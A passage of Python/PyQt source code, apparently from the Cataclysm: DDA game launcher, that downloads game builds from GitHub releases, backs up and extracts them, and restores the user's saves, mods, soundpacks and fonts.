dowloading_speed_label\n\n downloading_size_label = QLabel()\n status_bar.addWidget(downloading_size_label)\n self.downloading_size_label = downloading_size_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.downloading_progress_bar = progress_bar\n progress_bar.setMinimum(0)\n\n self.download_last_read = datetime.utcnow()\n self.download_last_bytes_read = 0\n self.download_speed_count = 0\n\n request = QNetworkRequest(QUrl(redirected_url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n\n self.downloading_file = open(self.downloaded_file, 'wb')\n\n self.download_http_reply = self.qnam.get(request)\n self.download_http_reply.finished.connect(\n self.download_http_finished)\n self.download_http_reply.readyRead.connect(\n self.download_http_ready_read)\n self.download_http_reply.downloadProgress.connect(\n self.download_dl_progress)\n\n return\n\n # Test downloaded file\n status_bar.showMessage(_('Testing downloaded file archive'))\n\n class TestingZipThread(QThread):\n completed = pyqtSignal()\n invalid = pyqtSignal()\n not_downloaded = pyqtSignal()\n\n def __init__(self, downloaded_file):\n super(TestingZipThread, self).__init__()\n\n self.downloaded_file = downloaded_file\n\n def __del__(self):\n self.wait()\n\n def run(self):\n try:\n with zipfile.ZipFile(self.downloaded_file) as z:\n if z.testzip() is not None:\n self.invalid.emit()\n return\n except zipfile.BadZipFile:\n self.not_downloaded.emit()\n return\n\n self.completed.emit()\n\n def completed_test():\n self.test_thread = None\n\n status_bar.clearMessage()\n self.clear_previous_dir()\n\n def invalid():\n self.test_thread = None\n\n status_bar.clearMessage()\n status_bar.showMessage(_('Downloaded 
archive is invalid'))\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n self.finish_updating()\n\n def not_downloaded():\n self.test_thread = None\n\n status_bar.clearMessage()\n status_bar.showMessage(_('Could not download game'))\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n self.finish_updating()\n\n test_thread = TestingZipThread(self.downloaded_file)\n test_thread.completed.connect(completed_test)\n test_thread.invalid.connect(invalid)\n test_thread.not_downloaded.connect(not_downloaded)\n test_thread.start()\n\n self.test_thread = test_thread\n\n def clear_previous_dir(self):\n self.clearing_previous_dir = True\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n game_dir = game_dir_group_box.dir_combo.currentText()\n self.game_dir = game_dir\n\n backup_dir = os.path.join(game_dir, 'previous_version')\n if os.path.isdir(backup_dir):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Deleting {name}').format(\n name=_('previous_version directory')))\n\n if delete_path(backup_dir):\n self.backup_current_game()\n else:\n status_bar.showMessage(_('Update cancelled - Could not delete '\n 'the {name}.').format(name=_('previous_version directory')))\n self.finish_updating()\n else:\n self.backup_current_game()\n\n def backup_current_game(self):\n self.clearing_previous_dir = False\n self.progress_rmtree = None\n\n self.backing_up_game = True\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n game_dir = game_dir_group_box.dir_combo.currentText()\n self.game_dir = game_dir\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n backup_dir = os.path.join(game_dir, 'previous_version')\n\n dir_list = os.listdir(game_dir)\n self.backup_dir_list = dir_list\n\n if (config_true(get_config_value('prevent_save_move', 'False'))\n and 'save' in dir_list):\n dir_list.remove('save')\n\n launcher_exe = os.path.abspath(sys.executable)\n launcher_dir = os.path.dirname(launcher_exe)\n if os.path.abspath(game_dir) == launcher_dir:\n launcher_name = os.path.basename(launcher_exe)\n if launcher_name in dir_list:\n dir_list.remove(launcher_name)\n\n if len(dir_list) > 0:\n status_bar.showMessage(_('Backing up current game'))\n\n status_bar.busy += 1\n\n backup_label = QLabel()\n status_bar.addWidget(backup_label, 100)\n self.backup_label = backup_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.backup_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.backup_timer = timer\n\n progress_bar.setRange(0, len(dir_list))\n\n os.makedirs(backup_dir)\n self.backup_dir = backup_dir\n self.backup_index = 0\n self.backup_current_display = True\n\n def timeout():\n self.backup_progress_bar.setValue(self.backup_index)\n\n if self.backup_index == len(self.backup_dir_list):\n self.backup_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.backup_label)\n status_bar.removeWidget(self.backup_progress_bar)\n\n status_bar.busy -= 1\n status_bar.clearMessage()\n\n self.backing_up_game = False\n self.extract_new_build()\n\n else:\n backup_element = self.backup_dir_list[self.backup_index]\n\n if self.backup_current_display:\n self.backup_label.setText(_('Backing up {0}').format(\n backup_element))\n self.backup_current_display = False\n else:\n srcpath = os.path.join(self.game_dir, 
backup_element)\n if not move_path(srcpath, self.backup_dir):\n self.backup_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.backup_label)\n status_bar.removeWidget(self.backup_progress_bar)\n\n status_bar.busy -= 1\n status_bar.clearMessage()\n\n self.finish_updating()\n\n msg = (_('Could not move {srcpath} in {dstpath} .')\n ).format(\n srcpath=srcpath,\n dstpath=self.backup_dir\n )\n\n status_bar.showMessage(msg)\n\n self.backup_index += 1\n self.backup_current_display = True\n\n timer.timeout.connect(timeout)\n timer.start(0)\n else:\n self.backing_up_game = False\n self.extract_new_build()\n\n def extract_new_build(self):\n self.extracting_new_build = True\n\n z = zipfile.ZipFile(self.downloaded_file)\n self.extracting_zipfile = z\n\n self.extracting_infolist = z.infolist()\n self.extracting_index = 0\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.busy += 1\n\n extracting_label = QLabel()\n status_bar.addWidget(extracting_label, 100)\n self.extracting_label = extracting_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.extracting_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.extracting_timer = timer\n\n progress_bar.setRange(0, len(self.extracting_infolist))\n\n def timeout():\n self.extracting_progress_bar.setValue(self.extracting_index)\n\n if self.extracting_index == len(self.extracting_infolist):\n self.extracting_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.extracting_label)\n status_bar.removeWidget(self.extracting_progress_bar)\n\n status_bar.busy -= 1\n\n self.extracting_new_build = False\n\n self.extracting_zipfile.close()\n\n # Keep a copy of the archive if selected in the settings\n if config_true(get_config_value('keep_archive_copy', 'False')):\n archive_dir = get_config_value('archive_directory', '')\n archive_name = os.path.basename(self.downloaded_file)\n move_target = os.path.join(archive_dir, archive_name)\n if (os.path.isdir(archive_dir)\n and not os.path.exists(move_target)):\n shutil.move(self.downloaded_file, archive_dir)\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n self.analysing_new_build = True\n game_dir_group_box.analyse_new_build(self.selected_build)\n\n else:\n extracting_element = self.extracting_infolist[\n self.extracting_index]\n self.extracting_label.setText(_('Extracting {0}').format(\n extracting_element.filename))\n\n try:\n self.extracting_zipfile.extract(extracting_element,\n self.game_dir)\n except OSError as e:\n # Display the error and stop the update process\n error_msgbox = QMessageBox()\n error_msgbox.setWindowTitle(\n _('Cannot extract game archive'))\n\n text = _('''\n

The launcher failed to extract the game archive.\n\nIt received the following error from the operating system: {error}\n
    '''\n ).format(error=html.escape(e.strerror))\n\n error_msgbox.setText(text)\n error_msgbox.addButton(_('OK'), QMessageBox.YesRole)\n error_msgbox.setIcon(QMessageBox.Critical)\n\n error_msgbox.exec()\n\n self.update_game()\n\n self.extracting_index += 1\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n def asset_name(self, path, filename):\n asset_file = os.path.join(path, filename)\n\n if not os.path.isfile(asset_file):\n disabled_asset_file = os.path.join(path, filename + '.disabled')\n if not os.path.isfile(disabled_asset_file):\n return None\n else:\n asset_file_path = disabled_asset_file\n else:\n asset_file_path = asset_file\n\n try:\n with open(asset_file_path, 'r', encoding='latin1') as f:\n for line in f:\n if line.startswith('NAME'):\n space_index = line.find(' ')\n name = line[space_index:].strip().replace(\n ',', '')\n return name\n except FileNotFoundError:\n return None\n return None\n\n def mod_ident(self, path):\n json_file = os.path.join(path, 'modinfo.json')\n if not os.path.isfile(json_file):\n json_file = os.path.join(path, 'modinfo.json.disabled')\n if os.path.isfile(json_file):\n try:\n with open(json_file, 'r', encoding='utf8') as f:\n try:\n values = json.load(f)\n if isinstance(values, dict):\n if values.get('type', '') == 'MOD_INFO':\n return values.get('ident', None)\n elif isinstance(values, list):\n for item in values:\n if (isinstance(item, dict)\n and item.get('type', '') == 'MOD_INFO'):\n return item.get('ident', None)\n except ValueError:\n pass\n except FileNotFoundError:\n return None\n\n return None\n\n def copy_next_dir(self):\n if self.in_post_extraction and len(self.previous_dirs) > 0:\n next_dir = self.previous_dirs.pop()\n src_path = os.path.join(self.previous_version_dir, next_dir)\n dst_path = os.path.join(self.game_dir, next_dir)\n if os.path.isdir(src_path) and not os.path.exists(dst_path):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n progress_copy = ProgressCopyTree(src_path, dst_path,\n self.previous_dirs_skips, status_bar,\n _('{0} directory').format(next_dir))\n progress_copy.completed.connect(self.copy_next_dir)\n self.progress_copy = progress_copy\n progress_copy.start()\n else:\n self.copy_next_dir()\n elif self.in_post_extraction:\n self.progress_copy = None\n self.post_extraction_step2()\n\n def post_extraction(self):\n self.analysing_new_build = False\n self.in_post_extraction = True\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n # Copy config, save, templates and memorial directory from previous\n # version\n previous_version_dir = os.path.join(self.game_dir, 'previous_version')\n if os.path.isdir(previous_version_dir) and self.in_post_extraction:\n\n previous_dirs = ['config', 'save', 'templates', 'memorial',\n 'graveyard', 'save_backups']\n if (config_true(get_config_value('prevent_save_move', 'False')) and\n 'save' in previous_dirs):\n previous_dirs.remove('save')\n\n self.previous_dirs = previous_dirs\n self.previous_version_dir = previous_version_dir\n\n # Skip debug files\n self.previous_dirs_skips = set()\n self.previous_dirs_skips.update((\n os.path.join(previous_version_dir, 'config', 'debug.log'),\n os.path.join(previous_version_dir, 'config', 'debug.log.prev')\n ))\n\n self.progress_copy = None\n self.copy_next_dir()\n elif self.in_post_extraction:\n # New install\n self.in_post_extraction = False\n self.finish_updating()\n\n def post_extraction_step2(self):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n # 
Copy custom tilesets and soundpack from previous version\n # tilesets\n tilesets_dir = os.path.join(self.game_dir, 'gfx')\n previous_tilesets_dir = os.path.join(self.game_dir, 'previous_version',\n 'gfx')\n\n if (os.path.isdir(tilesets_dir) and os.path.isdir(previous_tilesets_dir)\n and self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom tilesets'))\n\n official_set = {}\n for entry in os.listdir(tilesets_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(tilesets_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'tileset.txt')\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n\n previous_set = {}\n for entry in os.listdir(previous_tilesets_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(previous_tilesets_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'tileset.txt')\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n for item in custom_set:\n if not self.in_post_extraction:\n break\n\n target_dir = os.path.join(tilesets_dir, os.path.basename(\n previous_set[item]))\n if not os.path.exists(target_dir):\n shutil.copytree(previous_set[item], target_dir)\n\n status_bar.clearMessage()\n\n # soundpacks\n soundpack_dir = os.path.join(self.game_dir, 'data', 'sound')\n previous_soundpack_dir = os.path.join(self.game_dir, 'previous_version',\n 'data', 'sound')\n\n if (os.path.isdir(soundpack_dir) and os.path.isdir(\n previous_soundpack_dir) and self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom soundpacks'))\n\n official_set = {}\n for entry in os.listdir(soundpack_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(soundpack_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'soundpack.txt')\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n\n previous_set = {}\n for entry in os.listdir(previous_soundpack_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(previous_soundpack_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'soundpack.txt')\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n if len(custom_set) > 0:\n self.soundpack_dir = soundpack_dir\n self.previous_soundpack_set = previous_set\n self.custom_soundpacks = list(custom_set)\n\n self.copy_next_soundpack()\n else:\n status_bar.clearMessage()\n self.post_extraction_step3()\n\n else:\n self.post_extraction_step3()\n\n def copy_next_soundpack(self):\n if self.in_post_extraction and len(self.custom_soundpacks) > 0:\n next_item = self.custom_soundpacks.pop()\n dst_path = os.path.join(self.soundpack_dir, os.path.basename(\n self.previous_soundpack_set[next_item]))\n src_path = self.previous_soundpack_set[next_item]\n if os.path.isdir(src_path) and not os.path.exists(dst_path):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n progress_copy = ProgressCopyTree(src_path, dst_path, None,\n status_bar, _('{name} soundpack').format(name=next_item))\n progress_copy.completed.connect(self.copy_next_soundpack)\n self.progress_copy = progress_copy\n progress_copy.start()\n else:\n self.copy_next_soundpack()\n elif self.in_post_extraction:\n self.progress_copy = None\n\n 
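# All queued soundpacks have been copied; clear the status bar message and\n            # continue with the next post-extraction step.\n            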
main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n self.post_extraction_step3()\n\n def preserve_custom_fonts(self):\n \"\"\"\n Copy over any files in the previous font directory\n that don't already exist in the current font directory.\n\n This assumes that fonts distributed with CDDA have already\n been extracted into the current font directory.\n \"\"\"\n status_bar = self.get_main_window().statusBar()\n\n join_parts = lambda parts: Path(os.path.join(*parts))\n\n font_locations = [\n [self.game_dir, 'font'], # User fonts\n [self.game_dir, 'data', 'font'] # Game fonts\n ]\n\n prev_font_locations = [\n [base, 'previous_version'] + parts for base, *parts in font_locations\n ]\n\n # A list of tuples with the shape (CURRENT_FONT_DIR, PREV_FONT_DIR)\n font_paths = list(tuple(\n zip(\n map(join_parts, font_locations),\n map(join_parts, prev_font_locations)\n )\n ))\n\n if (any(font_paths) and self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom fonts'))\n\n for font_dir, prev_font_dir in font_paths:\n # Skip the dir if we have nothing to restore\n if not prev_font_dir.exists() or not prev_font_dir.is_dir():\n continue\n\n # Determine if the current version includes any bundled fonts\n if font_dir.is_dir():\n with os.scandir(font_dir) as entries:\n current_set = set(entries)\n else:\n # Create a new font directory if it doesn't already exist\n font_dir.mkdir(exist_ok=True)\n current_set = set()\n\n with os.scandir(prev_font_dir) as entries:\n previous_set = set(entries)\n\n # Determine what font files need to be restored\n delta = previous_set - current_set\n\n for entry in delta:\n source = prev_font_dir.joinpath(entry.name)\n target = font_dir.joinpath(entry.name)\n\n if entry.is_file():\n shutil.copy2(source, target)\n elif entry.is_dir():\n shutil.copytree(source, target)\n\n status_bar.clearMessage()\n\n def post_extraction_step3(self):\n if not self.in_post_extraction:\n return\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n # Copy custom mods from previous version\n # mods\n mods_dir = os.path.join(self.game_dir, 'data', 'mods')\n previous_mods_dir = os.path.join(self.game_dir, 'previous_version',\n 'data', 'mods')\n\n if (os.path.isdir(mods_dir) and os.path.isdir(previous_mods_dir) and\n self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom mods'))\n\n official_set = {}\n for entry in os.listdir(mods_dir):\n entry_path = os.path.join(mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n previous_set = {}\n for entry in os.listdir(previous_mods_dir):\n entry_path = os.path.join(previous_mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n for item in custom_set:\n target_dir = os.path.join(mods_dir, os.path.basename(\n previous_set[item]))\n if not os.path.exists(target_dir):\n shutil.copytree(previous_set[item], target_dir)\n\n status_bar.clearMessage()\n\n if not self.in_post_extraction:\n return\n\n # user mods\n user_mods_dir = os.path.join(self.game_dir, 'mods')\n previous_user_mods_dir = os.path.join(self.game_dir, 'previous_version',\n 'mods')\n\n if (os.path.isdir(previous_user_mods_dir) and self.in_post_extraction):\n 
status_bar.showMessage(_('Restoring user custom mods'))\n\n if not os.path.exists(user_mods_dir):\n os.makedirs(user_mods_dir)\n\n official_set = {}\n for entry in os.listdir(user_mods_dir):\n entry_path = os.path.join(user_mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n previous_set = {}\n for entry in os.listdir(previous_user_mods_dir):\n entry_path = os.path.join(previous_user_mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n for item in custom_set:\n target_dir = os.path.join(user_mods_dir, os.path.basename(\n previous_set[item]))\n if not os.path.exists(target_dir):\n shutil.copytree(previous_set[item], target_dir)\n\n status_bar.clearMessage()\n\n if not self.in_post_extraction:\n return\n\n # Copy user-default-mods.json if present\n user_default_mods_file = os.path.join(mods_dir, 'user-default-mods.json')\n previous_user_default_mods_file = os.path.join(previous_mods_dir, 'user-default-mods.json')\n\n if (not os.path.exists(user_default_mods_file)\n and os.path.isfile(previous_user_default_mods_file)):\n status_bar.showMessage(_('Restoring {0}').format('user-default-mods.json'))\n\n shutil.copy2(previous_user_default_mods_file,\n user_default_mods_file)\n\n status_bar.clearMessage()\n\n self.preserve_custom_fonts()\n\n if not self.in_post_extraction:\n return\n\n self.in_post_extraction = False\n\n if config_true(get_config_value('remove_previous_version', 'False')):\n self.remove_previous_version()\n else:\n self.after_updating_message()\n self.finish_updating()\n\n def remove_previous_version(self):\n previous_version_dir = os.path.join(self.game_dir, 'previous_version')\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n progress_rmtree = ProgressRmTree(previous_version_dir, status_bar,\n _('previous_version directory'))\n\n def rmtree_completed():\n self.progress_rmtree = None\n\n self.after_updating_message()\n self.finish_updating()\n\n progress_rmtree.completed.connect(rmtree_completed)\n progress_rmtree.aborted.connect(rmtree_completed)\n self.progress_rmtree = progress_rmtree\n progress_rmtree.start()\n\n def after_updating_message(self):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n if game_dir_group_box.previous_exe_path is not None:\n status_bar.showMessage(_('Update completed'))\n else:\n status_bar.showMessage(_('Installation completed'))\n\n if (game_dir_group_box.current_build is not None\n and status_bar.busy == 0):\n last_build = self.builds[0]\n\n message = status_bar.currentMessage()\n if message != '':\n message = message + ' - '\n\n if last_build['number'] == game_dir_group_box.current_build:\n message = message + _('Your game is up to date')\n else:\n message = message + _('There is a new update available')\n status_bar.showMessage(message)\n\n def finish_updating(self):\n self.updating = False\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n game_dir_group_box.enable_controls()\n self.enable_controls(True)\n\n game_dir_group_box.update_soundpacks()\n game_dir_group_box.update_mods()\n game_dir_group_box.update_backups()\n\n soundpacks_tab = 
main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.enable_tab()\n mods_tab.enable_tab()\n settings_tab.enable_tab()\n backups_tab.enable_tab()\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Update game'))\n else:\n self.update_button.setText(_('Install game'))\n\n if self.close_after_update:\n self.get_main_window().close()\n\n def download_http_ready_read(self):\n self.downloading_file.write(self.download_http_reply.readAll())\n\n def download_dl_progress(self, bytes_read, total_bytes):\n self.downloading_progress_bar.setMaximum(total_bytes)\n self.downloading_progress_bar.setValue(bytes_read)\n\n self.download_speed_count += 1\n\n self.downloading_size_label.setText(\n '{bytes_read}/{total_bytes}'\n .format(bytes_read=sizeof_fmt(bytes_read), total_bytes=sizeof_fmt(total_bytes))\n )\n\n if self.download_speed_count % 5 == 0:\n delta_bytes = bytes_read - self.download_last_bytes_read\n delta_time = datetime.utcnow() - self.download_last_read\n\n bytes_secs = delta_bytes / delta_time.total_seconds()\n self.dowloading_speed_label.setText(_('{bytes_sec}/s').format(\n bytes_sec=sizeof_fmt(bytes_secs)))\n\n self.download_last_bytes_read = bytes_read\n self.download_last_read = datetime.utcnow()\n\n def start_lb_request(self, base_asset, new_base_asset):\n self.disable_controls(True)\n self.refresh_warning_label.hide()\n self.find_build_warning_label.hide()\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n status_bar.busy += 1\n\n self.builds_combo.clear()\n self.builds_combo.addItem(_('Fetching remote builds'))\n\n url = cons.GITHUB_REST_API_URL + cons.CDDA_RELEASES\n self.base_asset = base_asset\n self.new_base_asset = new_base_asset\n\n fetching_label = QLabel()\n fetching_label.setText(_('Fetching: {url}').format(url=url))\n self.base_url = url\n status_bar.addWidget(fetching_label, 100)\n self.fetching_label = fetching_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.fetching_progress_bar = progress_bar\n\n progress_bar.setMinimum(0)\n\n self.lb_html = BytesIO()\n\n request = QNetworkRequest(QUrl(url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.http_reply = self.qnam.get(request)\n self.http_reply.finished.connect(self.lb_http_finished)\n self.http_reply.readyRead.connect(self.lb_http_ready_read)\n self.http_reply.downloadProgress.connect(self.lb_dl_progress)\n\n @property\n def app_locale(self):\n return QApplication.instance().app_locale\n\n def warn_rate_limit(self, requests_remaining, reset_dt):\n # Warn about remaining requests on GitHub API\n reset_dt_display = _('Unknown')\n if reset_dt is not None:\n reset_dt_local = reset_dt.astimezone(tz=None)\n reset_dt_display = format_datetime(reset_dt_local,\n format='long', locale=self.app_locale)\n\n message = _('You have {remaining} '\n 'request(s) remaining for accessing GitHub API.\\nYou will have to '\n 'wait until {datetime} to get more requests.\\nThose requests are '\n 'needed to get the available builds.\\nIf you keep running low on '\n 'those remaining requests, avoid quickly refreshing often\\n for the '\n 'available builds. 
For more information, search GitHub API rate '\n 'limiting.').format(\n remaining=requests_remaining,\n datetime=reset_dt_display\n )\n\n self.refresh_warning_label.show()\n self.refresh_warning_label.setToolTip(message)\n self.find_build_warning_label.setToolTip(message)\n\n selected_branch = self.branch_button_group.checkedButton()\n if selected_branch == self.experimental_radio_button:\n self.find_build_warning_label.show()\n\n def lb_http_finished(self):\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.fetching_label)\n status_bar.removeWidget(self.fetching_progress_bar)\n\n redirect = self.http_reply.attribute(\n QNetworkRequest.RedirectionTargetAttribute)\n if redirect is not None:\n redirected_url = urljoin(\n self.http_reply.request().url().toString(),\n redirect.toString())\n\n fetching_label = QLabel()\n fetching_label.setText(_('Fetching: {url}').format(\n url=redirected_url))\n self.base_url = redirected_url\n status_bar.addWidget(fetching_label, 100)\n self.fetching_label = fetching_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.fetching_progress_bar = progress_bar\n\n progress_bar.setMinimum(0)\n\n self.lb_html = BytesIO()\n\n request = QNetworkRequest(QUrl(redirected_url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.http_reply = self.qnam.get(request)\n self.http_reply.finished.connect(self.lb_http_finished)\n self.http_reply.readyRead.connect(self.lb_http_ready_read)\n self.http_reply.downloadProgress.connect(self.lb_dl_progress)\n return\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n status_bar.busy -= 1\n\n if not game_dir_group_box.game_started:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Ready'))\n\n self.enable_controls()\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Game process is running'))\n\n requests_remaining = None\n if self.http_reply.hasRawHeader(cons.GITHUB_XRL_REMAINING):\n requests_remaining = self.http_reply.rawHeader(cons.GITHUB_XRL_REMAINING)\n requests_remaining = tryint(requests_remaining)\n\n reset_dt = None\n if self.http_reply.hasRawHeader(cons.GITHUB_XRL_RESET):\n reset_dt = self.http_reply.rawHeader(cons.GITHUB_XRL_RESET)\n reset_dt = tryint(reset_dt)\n reset_dt = arrow.get(reset_dt)\n\n if requests_remaining is not None and requests_remaining <= 10:\n self.warn_rate_limit(requests_remaining, reset_dt)\n\n status_code = self.http_reply.attribute(\n QNetworkRequest.HttpStatusCodeAttribute)\n if status_code != 200:\n reason = self.http_reply.attribute(\n QNetworkRequest.HttpReasonPhraseAttribute)\n url = self.http_reply.request().url().toString()\n msg = (\n _('Could not find launcher latest release when requesting {url}. 
Error: {error}')\n .format(url=url, error=f'[HTTP {status_code}] ({reason})')\n )\n if status_bar.busy == 0:\n status_bar.showMessage(msg)\n logger.warning(msg)\n\n self.builds = None\n\n self.builds_combo.clear()\n self.builds_combo.addItem(msg)\n self.builds_combo.setEnabled(False)\n\n self.lb_html = None\n return\n\n self.lb_html.seek(0)\n try:\n releases = json.loads(TextIOWrapper(self.lb_html, encoding='utf8'\n ).read())\n except json.decoder.JSONDecodeError:\n releases = []\n self.lb_html = None\n\n builds = []\n\n asset_platform = self.base_asset['Platform']\n asset_graphics = self.base_asset['Graphics']\n\n target_regex = re.compile(r'cataclysmdda-(?P<version>.+)-' +\n re.escape(asset_platform) + r'-' +\n re.escape(asset_graphics) + r'-' +\n r'b?(?P<build>\d+)\.zip'\n )\n \n new_asset_platform = self.new_base_asset['Platform']\n new_asset_graphics = self.new_base_asset['Graphics']\n\n new_target_regex = re.compile(\n r'cdda-windows-' +\n re.escape(new_asset_graphics) + r'-' +\n re.escape(new_asset_platform) + r'-' +\n r'b?(?P<build>[0-9\-]+)\.zip'\n )\n\n build_regex = re.compile(r'[Bb]uild #?(?P<build>[0-9\-]+)')\n\n for release in releases:\n if any(x not in release for x in ('name', 'created_at')):\n continue\n\n build_match = build_regex.search(release['name'])\n if build_match is not None:\n asset = None\n if 'assets' in release:\n asset_iter = (\n x for x in release['assets']\n if 'browser_download_url' in x\n and 'name' in x\n and (\n target_regex.search(x['name']) is not None or\n new_target_regex.search(x['name']) is not None)\n )\n asset = next(asset_iter, None)\n\n build = {\n 'url': asset['browser_download_url'] if asset is not None\n else None,\n 'name': asset['name'] if asset is not None else None,\n 'number': build_match.group('build'),\n 'date': arrow.get(release['created_at']).datetime\n }\n builds.append(build)\n\n if len(builds) > 0:\n builds.sort(key=lambda x: (x['date'], x['number']), reverse=True)\n self.builds = builds\n\n self.builds_combo.clear()\n for build in builds:\n if build['date'] is not None:\n build_date = arrow.get(build['date'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(),\n locale=self.app_locale)\n else:\n human_delta = _('Unknown')\n\n self.builds_combo.addItem(\n '{number} ({delta})'.format(number=build['number'], delta=human_delta),\n userData=build\n )\n\n combo_model = self.builds_combo.model()\n default_set = False\n for x in range(combo_model.rowCount()):\n if combo_model.item(x).data(Qt.UserRole)['url'] is None:\n combo_model.item(x).setEnabled(False)\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - build unavailable'))\n elif not default_set:\n default_set = True\n self.builds_combo.setCurrentIndex(x)\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - latest build available'))\n\n if not game_dir_group_box.game_started:\n self.builds_combo.setEnabled(True)\n else:\n self.previous_bc_enabled = True\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Update game'))\n\n if (game_dir_group_box.current_build is not None\n and status_bar.busy == 0\n and not game_dir_group_box.game_started):\n last_build = self.builds[0]\n\n message = status_bar.currentMessage()\n if message != '':\n message = message + ' - '\n\n if last_build['number'] == game_dir_group_box.current_build:\n message = message + _('Your game is up to date')\n else:\n message = message + _('There is a new update available')\n status_bar.showMessage(message)\n else:\n self.update_button.setText(_('Install game'))\n\n 
else:\n self.builds = None\n\n self.builds_combo.clear()\n self.builds_combo.addItem(_('Could not find remote builds'))\n self.builds_combo.setEnabled(False)\n\n def lb_http_ready_read(self):\n self.lb_html.write(self.http_reply.readAll())\n\n def lb_dl_progress(self, bytes_read, total_bytes):\n self.fetching_progress_bar.setMaximum(total_bytes)\n self.fetching_progress_bar.setValue(bytes_read)\n\n def show_hide_find_build(self):\n selected_branch = self.branch_button_group.checkedButton()\n\n widgets = (\n self.find_build_label,\n self.find_build_value,\n self.find_build_button\n )\n\n if selected_branch is self.stable_radio_button:\n for widget in widgets:\n widget.hide()\n self.find_build_warning_label.hide()\n elif selected_branch is self.experimental_radio_button:\n for widget in widgets:\n widget.show()\n if self.refresh_warning_label.isVisible():\n self.find_build_warning_label.show()\n\n def refresh_builds(self):\n selected_branch = self.branch_button_group.checkedButton()\n\n selected_platform = 